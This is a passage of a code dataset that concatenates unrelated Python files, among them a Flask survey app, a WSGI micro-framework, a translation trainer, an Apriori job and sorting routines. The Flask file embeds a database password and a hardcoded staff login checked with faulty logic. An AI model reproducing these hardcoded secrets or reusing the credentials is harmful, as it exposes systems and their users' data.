current_student.student_id = my_result[0][1]\n current_student.student_seat = my_result[0][2]\n return redirect(url_for('question'))\n else:\n return redirect(url_for('about'))\n\n return render_template('login.html', title = 'Login', form = form)\n\n\n@app.route(\"/office_login\", methods = ['POST', 'GET'])\ndef office_login():\n form = OfficeLogin()\n if form.validate_on_submit():\n username = request.form['username']\n password = request.form['password']\n if username == 'staff' & password == 'admin2020':\n return redirect(url_for('home'))\n return render_template('office_login.html', form = form)\n\n\n@app.route(\"/question\", methods = ['POST', 'GET'])\ndef question():\n student_info = StudentInfo\n name = student_info.student_name\n stid = student_info.student_id\n seat = student_info.student_seat\n form = QuestionTHForm()\n if form.validate_on_submit():\n age = request.form['age']\n phone = request.form['phone']\n company = request.form['company']\n question1 = request.form['question1']\n question2 = request.form['question2']\n question3 = request.form['question3']\n question4 = request.form['question4']\n question5 = request.form['question5']\n\n # insert question to table\n mydb = mysql.connector.connect(\n host = \"graduation.stamford.edu\",\n user 
= \"graduati_dbadmin\",\n password = \"y5wiE&RfprAnyrJS\",\n database = \"graduati_dbserver\",\n port = \"3306\"\n )\n mycursor = mydb.cursor()\n recordTuple = (stid, stid, name, age, phone, company, question1, question2, question3, question4, question5)\n mySql_insert_query = \"\"\"INSERT INTO graduate_survey (Id, student_id, name, age, phone, company,\n question1, question2, question3, question4, question5) \n VALUES \n (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s) \"\"\"\n mycursor.execute(mySql_insert_query, recordTuple)\n mydb.commit()\n # update register status\n mycursor.execute(\"SELECT MAX(number) FROM graduate_students\")\n my_result = mycursor.fetchall()\n maxvalue = my_result[0][0] + 1\n register_number = \"STIU-\" + str(maxvalue)\n mycursor.execute(\n \"UPDATE graduate_students SET registered =1,register_number = %s,number =%s WHERE student_id =%s\",\n (register_number, maxvalue, stid,))\n mydb.commit()\n if mycursor:\n mycursor.close()\n if mydb:\n mydb.close()\n return render_template('success.html', stid = stid, seat = seat)\n return render_template('question.html', form = form, name = name, stid = stid)\n\n\n@app.route(\"/about\")\ndef about():\n return render_template('about.html')\n\n\n@app.route(\"/backoffice\")\ndef backoffice():\n return render_template('backoffice.html')\n\n\n@app.route(\"/success\")\ndef success():\n student_info = StudentInfo\n seat = student_info.student_seat\n stid = student_info.student_id\n return render_template('success.html', stid = stid, seat = seat)\n\n\n@app.route(\"/seat\")\ndef seat():\n return render_template('seatDisplay.html')\n\n\n@app.route(\"/register\", methods = ['POST', 'GET'])\ndef register():\n form = RegistrationForm()\n if form.validate_on_submit():\n return redirect(url_for('home'))\n return render_template('register.html', title = 'Register', form = form)\n\n\nif __name__ == '__main__':\n app.run(debug = False)\n","sub_path":"Flask_blog/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5182,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"343848136","text":"from paste import reloader\nfrom paste.httpserver import serve\n\nfrom tf_request import Request\n\n\nclass TinyFramework:\n \"\"\"\n Примтивный WSGI-совместимый фреймворк\n \"\"\"\n\n def __init__(self):\n self.points = {}\n self.request = None\n\n def run(self, host, port):\n \"\"\"Запуск сервера приложения\"\"\"\n reloader.install()\n serve(self, host=host, port=port)\n\n def route(self, *s_args, **s_kwargs):\n \"\"\"Подключение функций к конкретным путям\"\"\"\n def decorator(func):\n def wrap(*args, **kwargs):\n item = dict()\n item['name'] = func.__name__\n item['methods'] = [method.upper() for method in kwargs['methods']]\n item['call'] = func\n self.points[kwargs['path'].lower()] = item\n return wrap(*s_args, **s_kwargs)\n return decorator\n\n def __call__(self, environ, start_response):\n \"\"\"\n Делаем объект вызываемым\n \"\"\"\n self.request = Request(environ)\n path = environ['PATH_INFO'].lower()\n method = environ['REQUEST_METHOD'].upper()\n if path not in self.points.keys():\n start_response('404 Not Found', [('Content-Type', 'text/html')])\n return ['Incorrect path: {}'.format(path).encode('utf-8')]\n if method not in self.points[path]['methods']:\n start_response('405 Method not allowed', [('Content-Type', 'text/html')])\n return ['Method not allowed: {}'.format(method)]\n result = self.points[path]['call']()\n start_response(result.status_code_as_str, result.headers)\n return 
[result.body]\n","sub_path":"tiny_framework.py","file_name":"tiny_framework.py","file_ext":"py","file_size_in_byte":1765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"}
+{"seq_id":"580424551","text":"text = 'I really really like apples'\n\ndef word_count(text):\n    text1 = text.replace('.', '')\n    text2 = text1.replace(',', '')\n    text3 = text2.replace('!', '')\n    text4 = text3.replace('?', '')\n    lst = text4.split()\n    counter = {}\n\n    for word in lst:\n        word_counter = counter.get(word)\n        if word_counter is None:\n            counter[word] = 1\n        else:\n            counter[word] = word_counter + 1\n    return counter\n\n    # unreachable alternative: count each unique word with a dict comprehension\n    counter = {word: lst.count(word) for word in set(lst)}\n    print(counter)\n\n\nprint(word_count(text))","sub_path":"num_of_words.py","file_name":"num_of_words.py","file_ext":"py","file_size_in_byte":551,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"}
+{"seq_id":"54754688","text":"#!/bin/python3\n\nfrom functools import reduce\n\ndef create_indexes(length):\n    a = length // 8\n    if length / 8 - a >= 0.5:\n        a += 1\n    x = []\n    for i in range(7):\n        x.append((a*i, a*(i+1)))\n    x.append((a*7, length))\n    return x\n\ndef printlist(l):\n    for (a,b) in create_indexes(len(l)):\n        print('{:2d}:{:2d} -> {}'.format(a,b,l[a:b]))\n\ndef explode(s):\n    if s == \"what's\":\n        return ['what', 'is']\n    if s == \"hasn't\":\n        return ['has', 'not']\n    if s == \"haven't\":\n        return ['have', 'not']\n    if s == \"shouldn't\":\n        return ['should', 'not']\n    if s == \"wouldn't\":\n        return ['would', 'not']\n    if s == \"couldn't\":\n        return ['could', 'not']\n    if s == \"aren't\":\n        return ['are', 'not']\n    if s == \"wasn't\":\n        return ['was', 'not']\n    if s == \"it's\":\n        return ['it', 'is']\n    return [s]\n\nrewrite = lambda xs: reduce(lambda out, cur: out + explode(cur), xs, [])\n","sub_path":"lab01/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":947,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"}
+{"seq_id":"184227952","text":"import os\nimport tempfile\nfrom django.test import TestCase, Client\nimport xlrd\n\n\nclass TestSubmissionImport(TestCase):\n    def setUp(self):\n        self.client = Client()\n        self.client.login(username='tester150411@gmail.com', password='tester150411')\n\n    def test_import_template(self):\n\n        resp = self.client.get('/entity/entity/template/cli051/?filename=clinic%20test%20project')\n\n        xlfile_fd, xlfile_name = tempfile.mkstemp(\".xls\")\n        os.write(xlfile_fd, resp.content)\n        os.close(xlfile_fd)\n        workbook = xlrd.open_workbook(xlfile_name)\n        sheet = workbook.sheet_by_index(0)\n        self.assertEqual(\n            [\n                u'entity_question\\n\\nEnter the unique ID for each clinic.\\nYou can find the clinic List on the My Subjects page.\\n\\nExample: cli01',\n                u'Name\\n\\nAnswer must be a word 10 characters maximum\\n\\n',\n                u'Father age\\n\\nEnter a number between 18-100.\\n\\n',\n                u'Report date\\n\\nAnswer must be a date in the following format: day.month.year\\n\\nExample: 25.12.2011',\n                u'Blood Group\\n\\nEnter 1 answer from the list.\\n\\nExample: a',\n                u'Symptoms\\n\\nEnter 1 or more answers from the list.\\n\\nExample: a or ab',\n                u'What is the GPS code for clinic?\\n\\nAnswer must be GPS co-ordinates in the following format: xx.xxxx,yy.yyyy.\\n\\nExample: -18.1324,27.6547',\n                u'Required Medicines\\n\\nEnter 1 or more answers from the list.\\n\\nExample: a or ab'\n            ], sheet.row_values(0, 0, 
8))","sub_path":"datawinners/project/submission/tests/test_submission_import.py","file_name":"test_submission_import.py","file_ext":"py","file_size_in_byte":1543,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"259646240","text":"\nfrom src.FileIoUtils import *\nfrom src.DataPreprocessingUtils import *\nfrom src.DeepLearner import *\n\n\n\n\n\n\n\n\n\n\n\n\n\n#instantiating the required objects.\nobj_fileIO = FileIoUtils()\nobj_dataPrepUtils = DataPreprocessingUtils()\nobj_deepLearner = DeepLearner()\n\n\n# #load dataset...\n# #======>>> Bengali 2 English: \"../Datasets/ben-eng/ben.txt\"\n# #======>>> German 2 English: \"../Datasets/deu-eng/deu.txt\"\ndataset = obj_fileIO.load_doc(\"../Datasets/deu-eng/deu.txt\")\n\n\n\n#transform the dataset in pairs...\ndataset_toPairs = obj_dataPrepUtils.to_pairs(dataset)\n\n\n#clean the datasets (removing punctuations, non-printable and so on)\ndataset_clean = obj_dataPrepUtils.clean_pairs(dataset_toPairs)\n\n#pickle save the cleaned dataset\nobj_fileIO.pickle_dump_data(dataset_clean, '../Datasets/deu-eng/english-german.pkl')\n\n\n#load pickle dumped dataset\nraw_dataset = obj_fileIO.load_pickle_dump_dataset('../Datasets/deu-eng/english-german.pkl')\n\n\n# reduce dataset size\nn_sentences = 7000\n\n\n\ntrainDataset, testDataset = obj_dataPrepUtils.train_test_split(raw_dataset[:n_sentences, :], 0.9)\n\nobj_fileIO.pickle_dump_data(trainDataset, '../Datasets/deu-eng/english-german-train.pkl')\nobj_fileIO.pickle_dump_data(testDataset, '../Datasets/deu-eng/english-german-test.pkl')\n\n#\n#\n#\n#\n\nmain_dataset = obj_fileIO.load_pickle_dump_dataset('../Datasets/deu-eng/english-german.pkl')\ntrain_dataset = obj_fileIO.load_pickle_dump_dataset('../Datasets/deu-eng/english-german-train.pkl')\ntest_dataset = obj_fileIO.load_pickle_dump_dataset('../Datasets/deu-eng/english-german-test.pkl')\n\n#\n#\n#\n# prepare english tokenizer\neng_tokenizer = obj_dataPrepUtils.create_tokenizer(main_dataset[:, 0])\neng_vocab_size = len(eng_tokenizer.word_index) + 1\neng_length = obj_dataPrepUtils.max_length(main_dataset[:, 0])\nprint('English Vocabulary Size: %d' % eng_vocab_size)\nprint('English Max Length: %d' % (eng_length))\n\n\n# prepare german tokenizer\nger_tokenizer = obj_dataPrepUtils.create_tokenizer(main_dataset[:, 1])\nger_vocab_size = len(ger_tokenizer.word_index) + 1\nger_length = obj_dataPrepUtils.max_length(main_dataset[:, 1])\nprint('German Vocabulary Size: %d' % ger_vocab_size)\nprint('German Max Length: %d' % (ger_length))\n\n\n\n# prepare training data\ntrainX = obj_dataPrepUtils.encode_sequences(ger_tokenizer, ger_length, train_dataset[:, 1])\ntrainY = obj_dataPrepUtils.encode_sequences(eng_tokenizer, eng_length, train_dataset[:, 0])\ntrainY = obj_dataPrepUtils.encode_output(trainY, eng_vocab_size)\n# prepare validation data\ntestX = obj_dataPrepUtils.encode_sequences(ger_tokenizer, ger_length, test_dataset[:, 1])\ntestY = obj_dataPrepUtils.encode_sequences(eng_tokenizer, eng_length, test_dataset[:, 0])\ntestY = obj_dataPrepUtils.encode_output(testY, eng_vocab_size)\n\n#\n#\n#\n\n# # define model\nmodel = obj_deepLearner.define_model(ger_vocab_size, eng_vocab_size, ger_length, eng_length, 256)\nmodel.compile(optimizer='adam', loss='categorical_crossentropy')\n# summarize defined model\nprint(model.summary())\n#plot_model(model, to_file='model.png', show_shapes=True)\n# fit model\nfilename = 'model.h5'\ncheckpoint = ModelCheckpoint(filename, monitor='val_loss', verbose=1, save_best_only=True, 
mode='min')\nmodel.fit(trainX, trainY, epochs=30, batch_size=64, validation_data=(testX, testY), callbacks=[checkpoint], verbose=2)\n\n\n\n\n\n\n\n# load model\nmodel = obj_fileIO.load_model('model.h5')\n\nobj_deepLearner.evaluate_model(model, eng_tokenizer, trainX, main_dataset)\n\n\n","sub_path":"src/main_GermanToEnglish.py","file_name":"main_GermanToEnglish.py","file_ext":"py","file_size_in_byte":3420,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"552480587","text":"from ui_lib.mapping import CartScreenLocators\nfrom ui_lib.functional import BasePageElement\n\n\nclass CartScreenFunctionality(BasePageElement):\n\n def __init__(self, driver):\n BasePageElement.__init__(self, driver)\n self._map = CartScreenLocators(driver)\n\n def check_if_item_exist_in_cart(self, book_item_):\n print('Verify book in the cart list:')\n print(book_item_)\n cart_items = self._map.cart_items.find_element()\n for item in cart_items:\n if self._is_same_item(item, book_item_):\n print('Item exist in the cart list')\n return True\n print('Item does not exist in the cart list')\n return False\n\n def _is_same_item(self, item_elm, book_item):\n return str.__contains__(item_elm.text, book_item.book_name[:20])\n","sub_path":"ui_lib/functional/cart_screen/cart_screen.py","file_name":"cart_screen.py","file_ext":"py","file_size_in_byte":820,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"424325856","text":"import soundcloud\r\nimport datetime\r\n\r\nclient = soundcloud.Client(\r\n client_id=\"***\",\r\n client_secret=\"***\",\r\n redirect_uri='***'\r\n)\r\nuser_list = client.get('/users/75602319/followings?linked_partitioning=true&page_size=50')\r\n\r\ntime = (datetime.datetime.now() - datetime.timedelta(hours=9,days=1)).time()\r\ntoday = (datetime.datetime.now() - datetime.timedelta(hours=9,days=1)).date()\r\n\r\n#today = today - datetime.timedelta(days=1)\r\n\r\ntoday_format = \"{}/{:02}/{:02} {} +0000\".format(today.year,today.month,today.day,str(time)[:8])\r\nprint(today_format)\r\n\r\nf = open('index.html', 'w')\r\nf.write(\"\")\r\nf.close()\r\n\r\nwhile True:\r\n\tembed_list = []\r\n\tprint(len(user_list.obj[\"collection\"]))\r\n\tfor user in user_list.obj[\"collection\"]:\r\n\t\ttrack_list = client.get('/users/{}/tracks'.format(user['id']),limit=3)\r\n\t\tif len(track_list)>0:\r\n\t\t\tif track_list[0].obj[\"created_at\"]>today_format:\r\n\t\t\t\tprint(track_list[0].obj[\"permalink_url\"])\r\n\t\t\t\tembed_info = '
'.format(track_list[0].obj[\"id\"])\r\n\t\t\t\tembed_list.append(embed_info)\r\n\tf = open('index.html', 'a')\r\n\tf.writelines(embed_list)\r\n\tf.close()\r\n\tif user_list.obj['next_href'] is None:\r\n\t\tbreak\r\n\telse:\r\n\t\tuser_list = client.get(user_list.obj['next_href'])","sub_path":"codes/get_stream.py","file_name":"get_stream.py","file_ext":"py","file_size_in_byte":1781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"221250838","text":"import sys\n\n\ndef calculate_averages(inputf, outputf):\n line_dict = {}\n output_lines = []\n for line in inputf:\n splitl = line[:-1].split('\\t')\n d_key = splitl[3] # Keying by forward primer\n reads = splitl[5] # Number of reads at this location for this sample\n try:\n line_dict[d_key].append(float(reads))\n except KeyError:\n line_dict[d_key] = [float(reads)]\n bareline = '\\t'.join(splitl[:-5]) # Saving the bed lines for later\n if bareline not in output_lines: # Inefficient but can't be bothered\n output_lines.append(bareline)\n\n # outputf.write('chrom\\tchromStart\\tchromEnd\\tfeature\\tforward\\treverse\\taverage_depth\\n')\n for line in output_lines:\n splitl = line.split('\\t')\n d_key = splitl[3]\n avg = [str(float(sum(line_dict[d_key]))/float(len(line_dict[d_key])))]\n # Pretending they're all structural variants so VEP will annotate them, cheating \n # but should work\n outline = splitl[:3] + ['DEL'] + splitl[3:] + avg\n outputf.write('\\t'.join(outline) + '\\n')\n\n\ndef main():\n input_pth = sys.argv[1]\n\n with open(input_pth, 'r') as inputf:\n calculate_averages(inputf, sys.stdout)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"Jared/gene_amplicon_bed_metrics/calc_amplicon_averages.py","file_name":"calc_amplicon_averages.py","file_ext":"py","file_size_in_byte":1279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"454352459","text":"n = int(input())\nsynonym = {}\n\nfor i in range(n):\n key, value = input().split()\n synonym[key] = value\nsearch = input()\n\nprint(synonym[search]) if search in synonym else print(list(synonym.keys())\n [list(synonym.values()).index(search)])","sub_path":"Weeks/Week 1/TSIS3/Part 2/3760.py","file_name":"3760.py","file_ext":"py","file_size_in_byte":296,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"149305982","text":"import threading\nfrom queue import Queue\nfrom spider import Spider\nfrom parse_domain import *\nfrom file_operations import *\n\n\nPROJECT_NAME = 'My GitHub'\nHOMEPAGE = 'https://github.com/zhuqinzhou'\nDOMAIN_NAME = get_domain_name(HOMEPAGE)\nQUEUE_FILE = PROJECT_NAME + '/queue.txt'\nCRAWLED_FILE = PROJECT_NAME + '/crawled.txt'\nNUMBER_OF_THREADS = 8\n\n# Uncomment to clear projects.\n# if os.path.exists('./'+PROJECT_NAME+'/crawled.txt'):\n# os.remove('./'+PROJECT_NAME+'/crawled.txt')\n# if os.path.exists('./'+PROJECT_NAME+'/queue.txt'):\n# os.remove('./'+PROJECT_NAME+'/queue.txt')\n\nqueue = Queue()\nSpider(PROJECT_NAME, HOMEPAGE, DOMAIN_NAME)\n\n\ndef create_workers():\n for _ in range(NUMBER_OF_THREADS):\n t = threading.Thread(target=work)\n t.daemon = True\n t.start()\n\n\ndef work():\n while True:\n url = queue.get()\n Spider.crawl_page(threading.current_thread().name, url)\n queue.task_done()\n\n\ndef create_jobs():\n for link in file_to_set(QUEUE_FILE):\n queue.put(link)\n queue.join()\n crawl()\n\n\ndef crawl():\n queue_links = file_to_set(QUEUE_FILE)\n if len(queue_links) > 0:\n 
print(str(len(queue_links)) + ' links in the queue.')\n create_jobs()\n\ncreate_workers()\ncrawl()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"41134944","text":"from pyspark import SparkContext\nimport sys\nimport itertools\nimport time\nimport math\n\ndef aprioriAlgo(partion,support) : \n # Apriori Algorithm\n # To Find First Frequent Pairs , count the number of values, for all count >= support, consider them to be L1\n ans = []\n index = 0 \n dictionaryForC1 = dict()\n for items in partion :\n for item in items :\n item_1 = item\n if(dictionaryForC1.get(item_1) != None) :\n dictionaryForC1[item_1] += 1\n else : \n dictionaryForC1[item_1] = 1\n index = index + 1\n support = math.ceil(support * (index/count))\n if(len(dictionaryForC1)>0) :\n l1 = [tuple([key]) for key,value in dictionaryForC1.items() if value >= support]\n l1= sorted(l1)\n ans = ans + l1\n # for All remaining pairs, rule of monotonicity.\n #If [a,b,c] is a frequent pair, then its immidiate subsets [a,b],[b,c],[c,a] should also be frequent.\n min_k = 2\n frequent_item_subset = l1\n while(True) :\n Cn= list()\n for frequent_item in itertools.combinations(frequent_item_subset,2) : \n candidateList = list(frequent_item[0])+ list(frequent_item[1])\n candidateSet = set(candidateList)\n candidateSet = sorted(candidateSet)\n if(len(candidateSet) == min_k and tuple(candidateSet) not in Cn): \n #Generate its subset, check if all of them are frequent or not.\n flag = True\n if(flag) : \n count_value = 0 \n for backets in partion :\n if(set(candidateSet).issubset(set(backets))) :\n count_value = count_value + 1\n if(count_value >=support) : \n Cn.append(tuple(candidateSet)) \n Cn.sort()\n if(len(Cn)==0) : \n break\n ans = ans + Cn\n frequent_item_subset = Cn\n min_k = min_k+1\n return ans\ndef mapPhase2(partion,candidatePairs):\n #Map Phase 2 \n dictionary = {}\n for basket in partion : \n for pair in candidatePairs : \n if(set(pair).issubset(set(basket))) : \n if(dictionary.get(tuple(pair)) != None) : \n dictionary[tuple(pair)] +=1\n else : \n dictionary[tuple(pair)] =1\n ans = [tuple([key,value]) for key,value in dictionary.items()]\n return ans\n\n\nstartDate = time.time()\nsc = SparkContext().getOrCreate()\ncsv_file = sc.textFile(sys.argv[3])\nmain = csv_file.take(1)\nrddcsv = csv_file.filter(lambda x: x not in str(main).strip(\"[]\"))\nrddMap = rddcsv.map(lambda x :x.split(\",\"))\nif int(sys.argv[1].strip()) == 1:\n caseRdd = rddMap.map(lambda x: (x[0],x[1])).reduceByKey(lambda x,y: x +\", \"+ y)\nelse : \n caseRdd = rddMap.map(lambda x: (x[1],x[0])).reduceByKey(lambda x,y: x +\", \"+ y)\ncaseRdd = caseRdd.map(lambda x : x[1].split(\", \"))\ncount = caseRdd.count()\nsupport = int(sys.argv[2])\ncandidatePairs = caseRdd.mapPartitions(lambda x : aprioriAlgo(list(x),support)).distinct().sortBy(lambda x : (len(set(x)),x))\ncollect = candidatePairs.collect()\nfrequentPairs = caseRdd.mapPartitions(lambda x : mapPhase2(list(x),collect)).reduceByKey(lambda x,y : x+y).filter(lambda x :x[1]>=support).sortBy(lambda x : (len(set(x[0])),x[0])).map(lambda x : x[0])\n\nf = open(sys.argv[4],\"w\")\nf.write(\"Candidates:\\n\")\nindex = 1\nstart = 0\nfor i in collect : \n if(len(i)==index and index !=1) :\n f.write(\",\"+str(i))\n elif(len(i)==index and index == 1): \n if(start == 0) : \n f.write(\"('\"+str(i[0]) +\"')\")\n else : \n f.write(\",('\"+str(i[0]) +\"')\")\n start = 1\n elif(len(i)==index + 
1):\n            index = index + 1\n            f.write('\\n')\n            f.write('\\n')\n        f.write(str(i))\nprint(\"Duration: \"+ str(time.time()-startDate)) if False else None\n
os.path.basename(anno_file)\n\n # Read and format annotation data\n anno_df = pd.read_csv(anno_file)\n if 'WorkerId' in anno_df.columns:\n anno_df = anno_df.drop(columns='WorkerId')\n num_annos = anno_df.shape[0]\n times_str = [x[7:-2] for x in anno_df.columns]\n times_sec = [float(t)/1000.0 for t in times_str]\n anno_df = anno_df.T\n anno_df.index = times_sec\n anno_df.columns = ['A%0d'%(i) for i in range(anno_df.shape[1])]\n\n # Normalize annotations\n anno_df = NormalizeAnnotations(anno_df)\n\n # Compute annotator agreement measure(s)\n anno_agree_dict[task_name] = {'name': task_name}\n\n # Cronbach's Alpha\n alpha = ComputeCronbachAlpha(anno_df)\n alpha = max(0,alpha) # Clamping to positive values, as per the paper\n anno_agree_dict[task_name]['cronbach_alpha_'+cur_dimension] = alpha\n\n # Pearson correlation\n num_pairs = ((anno_df.shape[1]-1)*anno_df.shape[1])/2\n avg_pearson = (anno_df.corr(method='pearson').sum().sum()-anno_df.shape[1])/(2*num_pairs)\n anno_agree_dict[task_name]['annotator_pearson_mean_'+cur_dimension] = avg_pearson\n\n # Store the sample length per task\n anno_agree_dict[task_name]['num_samples_'+cur_dimension] = anno_df.shape[0]\n\n # Save results\n anno_agree_df = pd.DataFrame(anno_agree_dict).T\n results_dict[cur_dimension] = anno_agree_df\n\n results_df = None\n for result in results_dict.keys():\n if results_df is None:\n results_df = results_dict[result]\n else:\n results_df = results_df.merge(results_dict[result], on='name', how='outer')\n results_df['cronbach_alpha_sum'] = results_df.loc[:,'cronbach_alpha_arousal'] + results_df.loc[:,'cronbach_alpha_valence']\n results_df['cronbach_alpha_prod'] = results_df.loc[:,'cronbach_alpha_arousal']*results_df.loc[:,'cronbach_alpha_valence']\n anno_agree_df = results_df.reindex(columns=['name', 'num_samples_arousal', 'num_samples_valence', 'annotator_pearson_mean_arousal', 'annotator_pearson_mean_valence', 'cronbach_alpha_arousal', 'cronbach_alpha_valence', 'cronbach_alpha_sum', 'cronbach_alpha_prod'])\n anno_agree_df = anno_agree_df.sort_values(by=['cronbach_alpha_prod'], ascending=False)\n anno_agree_df.to_csv(os.path.join(cur_file_path, output_file_path), index=False)\n return\n\nif __name__=='__main__':\n MediaevalAnnotatorAgreement()\n","sub_path":"scripts/dataset/mediaeval/baseline/annotator_agreement_mediaeval.py","file_name":"annotator_agreement_mediaeval.py","file_ext":"py","file_size_in_byte":4557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"458201608","text":"from pymongo import MongoClient\nimport re\nimport ast\nfrom textblob import TextBlob\n\n\nclient = MongoClient()\ndb = client.zomato\ncollection = db.reviews\n\nreviewsList = []\n\nrev = db.reviews.find({})\n\nsentences = []\n\nfor r in rev:\n\tx = str(r)\n\t#x.split('\"')\n\tx = re.findall('\".+?\"', x)\n\tx = filter(None, x)\n\ty = []\n\tfor i in x:\n\t\ty = i[1:-2]\n\t\tsentences.append(y)\n\t\t#y = y.split('(?>> import mars.tensor as mt\n\n >>> a = mt.arange(6).reshape(2,3)\n >>> a.execute()\n array([[0, 1, 2],\n [3, 4, 5]])\n >>> mt.argmax(a).execute()\n 5\n >>> mt.argmax(a, axis=0).execute()\n array([1, 1, 1])\n >>> mt.argmax(a, axis=1).execute()\n array([2, 2])\n\n Indexes of the maximal elements of a N-dimensional tensor:\n\n >>> ind = mt.unravel_index(mt.argmax(a, axis=None), a.shape)\n >>> ind.execute()\n (1, 2)\n >>> a[ind].execute() # TODO(jisheng): accomplish when fancy index on tensor is supported\n\n >>> b = mt.arange(6)\n >>> b[1] = 5\n >>> b.execute()\n array([0, 5, 2, 3, 4, 
5])\n >>> mt.argmax(b).execute() # Only the first occurrence is returned.\n 1\n\n \"\"\"\n op = TensorArgmax(axis=axis, dtype=np.dtype(int), combine_size=combine_size)\n return op(a, out=out)\n","sub_path":"mars/tensor/reduction/argmax.py","file_name":"argmax.py","file_ext":"py","file_size_in_byte":3663,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"373132163","text":"#!/usr/bin/python\nimport logging\nimport multiprocessing\nimport csv\nfrom Family import Family\nfrom consumer import Consumer\nfrom data_adapters import person_from_row\nfrom writer import Writer\n\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.DEBUG)\n\n\ndef simulate_stream(input_file, output_stream):\n task_queue = multiprocessing.JoinableQueue()\n results_queue = multiprocessing.Queue()\n num_consumers = multiprocessing.cpu_count()\n reader = csv.DictReader(open(input_file), delimiter=',')\n\n start_consumers(num_consumers, results_queue, task_queue)\n\n writer = Writer(results_queue, output_stream)\n writer.start()\n\n publish_rows(reader, task_queue)\n\n end_consumers(num_consumers, task_queue)\n\n logger.info(\"Waiting for processes to die...\")\n # Wait for all of the tasks to finish\n task_queue.join()\n writer.join()\n logger.info(\"Done ...\")\n\n\ndef start_consumers(num_consumers, results, tasks):\n logger.info('Creating %d consumers' % num_consumers)\n consumers = [Consumer(tasks, results)\n for i in xrange(num_consumers)]\n for w in consumers:\n w.start()\n\n\ndef end_consumers(num_consumers, tasks):\n logger.info(\"Killing everyone...\")\n for i in xrange(num_consumers):\n tasks.put(None)\n\n\ndef publish_rows(reader, tasks):\n current_family = None\n row_number = 0\n for row in reader:\n person = person_from_row(row)\n\n if current_family is None:\n current_family = Family(person.familiy_id)\n\n if current_family.ID == person.familiy_id:\n current_family.add_person(person)\n else:\n tasks.put(current_family)\n current_family = Family(person.familiy_id)\n current_family.add_person(person)\n row_number += 1\n if row_number % 10000 == 0:\n logger.info(row_number)\n tasks.put(current_family)\n","sub_path":"data_import.py","file_name":"data_import.py","file_ext":"py","file_size_in_byte":1886,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"502922483","text":"# TO-DO: complete the helper function below to merge 2 sorted arrays\r\ndef merge(arrA, arrB):\r\n elements = len(arrA) + len(arrB)\r\n merged_arr = [0] * elements\r\n # TO-DO\r\n index = index_a = index_b = 0\r\n while index_a < len(arrA) and index_b < len(arrB):\r\n if arrA[index_a] < arrB[index_b]:\r\n merged_arr[index] = arrA[index_a]\r\n index_a += 1\r\n index += 1\r\n else:\r\n merged_arr[index] = arrB[index_b]\r\n index_b += 1\r\n index += 1\r\n\r\n # Checking if any element was left\r\n while index_b < len(arrB):\r\n merged_arr[index] = arrB[index_b]\r\n index_b += 1\r\n index += 1\r\n\r\n while index_a < len(arrA):\r\n merged_arr[index] = arrA[index_a]\r\n index_a += 1\r\n index += 1\r\n\r\n return merged_arr\r\n\r\n\r\n# TO-DO: implement the Merge Sort function below USING RECURSION\r\n\r\ndef merge_sort(arr):\r\n # TO-DO\r\n if len(arr) <= 1:\r\n return arr\r\n mid = len(arr) // 2\r\n return merge(merge_sort(arr[:mid]), merge_sort(arr[mid:]))\r\n\r\n\r\n# STRETCH: implement an in-place merge sort algorithm\r\n\r\n\r\ndef merge_in_place(arr, start, mid, end):\r\n # TO-DO\r\n start2 = mid + 1\r\n while start <= mid and 
start2 <= end:\r\n if arr[start] <= arr[start2]:\r\n start += 1\r\n else:\r\n index, value = start2, arr[start2]\r\n while (index != start):\r\n arr[index] = arr[index - 1]\r\n index -= 1\r\n arr[start] = value\r\n start += 1\r\n mid += 1\r\n start2 += 1\r\n\r\n\r\ndef merge_sort_in_place(arr, l, r):\r\n # TO-DO\r\n if l < r:\r\n m = l + (r - l) // 2\r\n merge_sort_in_place(arr, l, m)\r\n merge_sort_in_place(arr, m + 1, r)\r\n merge_in_place(arr, l, m, r)\r\n\r\n return arr\r\n\r\n\r\n# STRETCH: implement the Timsort function below\r\n# hint: check out https://github.com/python/cpython/blob/master/Objects/listsort.txt\r\ndef timsort(arr):\r\n\r\n return arr\r\n\r\n\r\nprint([0] * 2)\r\n","sub_path":"src/recursive_sorting/recursive_sorting.py","file_name":"recursive_sorting.py","file_ext":"py","file_size_in_byte":2021,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"58146806","text":"from Behaviours.behaviours import BehaviourFramework\nimport time\n\n\nclass RBDB(BehaviourFramework):\n def __init__(self):\n super(RBDB, self).__init__()\n self.detection = False\n self.sensors = []\n self.bbcon = None\n self.priority = 8\n\n @staticmethod\n def godkjent_farge(farge):\n return farge[0] in range(139, 256) and farge[1] in range(71) and farge[1] in range(71)\n\n def where(self):\n img = self.sensors[0].update()\n hvor = []\n pixels = img.load()\n widith, height = img.size\n mid = widith // 2\n\n for x in range(widith):\n for y in range(height):\n if not self.godkjent_farge(pixels[x, y]):\n pixels[x, y] = (0, 0, 0)\n else:\n self.detection = True\n if x in range(mid - 15, mid + 15):\n 